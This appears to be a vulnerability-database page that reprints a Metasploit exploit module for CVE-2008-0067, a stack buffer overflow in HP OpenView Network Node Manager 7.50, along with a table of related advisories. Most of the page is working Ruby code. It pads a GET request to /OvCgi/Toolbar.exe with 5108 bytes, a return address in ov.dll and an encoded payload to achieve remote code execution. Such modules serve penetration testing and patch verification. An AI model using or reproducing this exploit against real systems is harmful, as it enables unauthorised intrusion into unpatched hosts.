HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow

🗓️ 17 Jul 2011 00:00:00Reported by RootType

HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflo

Reporter	Title	Published	Views	Family All 32
0day.today	HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow	16 Jul 201100:00	–	zdt
Circl	CVE-2008-0067	9 May 201000:00	–	circl
Check Point Advisories	Preemptive Protection against HP OpenView Network Node Manager Buffer Overflows	9 Jan 200900:00	–	checkpoint_advisories
Check Point Advisories	HP OpenView Network Node Manager CGI programs HTTP Request Buffer Overflow (CVE-2007-6204; CVE-2008-0067)	6 Dec 200900:00	–	checkpoint_advisories
CVE	CVE-2008-0067	8 Jan 200919:00	–	cve
Cvelist	CVE-2008-0067	8 Jan 200919:00	–	cvelist
Exploit DB	HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)	9 May 201000:00	–	exploitdb
Exploit DB	HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow	16 Jul 201100:00	–	exploitdb
Tenable Nessus	HP-UX PHSS_39245 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 22	15 Jun 200900:00	–	nessus
Tenable Nessus	HP-UX PHSS_39246 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 22	15 Jun 200900:00	–	nessus


                                                ##
# $Id: hp_nnm_toolbar_01.rb 13192 2011-07-16 04:45:21Z sinn3r $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 &lt; Msf::Exploit::Remote
    Rank = GreatRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           =&gt; 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',
            'Description'    =&gt; %q{
                    This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
                By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute
                arbitrary code.
            },
            'Author'         =&gt; [ 'MC' ],
            'License'        =&gt; MSF_LICENSE,
            'Version'        =&gt; '$Revision: 13192 $',
            'References'     =&gt;
                [
                    [ 'CVE', '2008-0067' ],
                    [ 'OSVDB', '53222' ],
                    [ 'BID', '33147' ],
                ],
            'DefaultOptions' =&gt;
                {
                    'EXITFUNC' =&gt; 'process',
                },
            'Privileged'     =&gt; false,
            'Payload'        =&gt;
                {
                    'Space'    =&gt; 650,
                    'BadChars' =&gt; &quot;\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&quot;,
                    'StackAdjustment' =&gt; -3500,
                },
            'Platform'       =&gt; 'win',
            'Targets'        =&gt;
                [
                    [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' =&gt; 0x5a01d78d } ], # ov.dll
                ],
            'DefaultTarget'  =&gt; 0,
            'DisclosureDate' =&gt; 'Jan 7 2009'))
 
        register_options( [ Opt::RPORT(80) ], self.class )
    end
 
    def exploit
 
        sploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded
 
        print_status(&quot;Trying target #{target.name}...&quot;)
 
        send_request_raw({
            'uri'       =&gt; &quot;/OvCgi/Toolbar.exe?&quot; + sploit,
            'method'    =&gt; &quot;GET&quot;,
            }, 5)
 
 
        handler
 
    end
 
end

17 Jul 2011 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.81949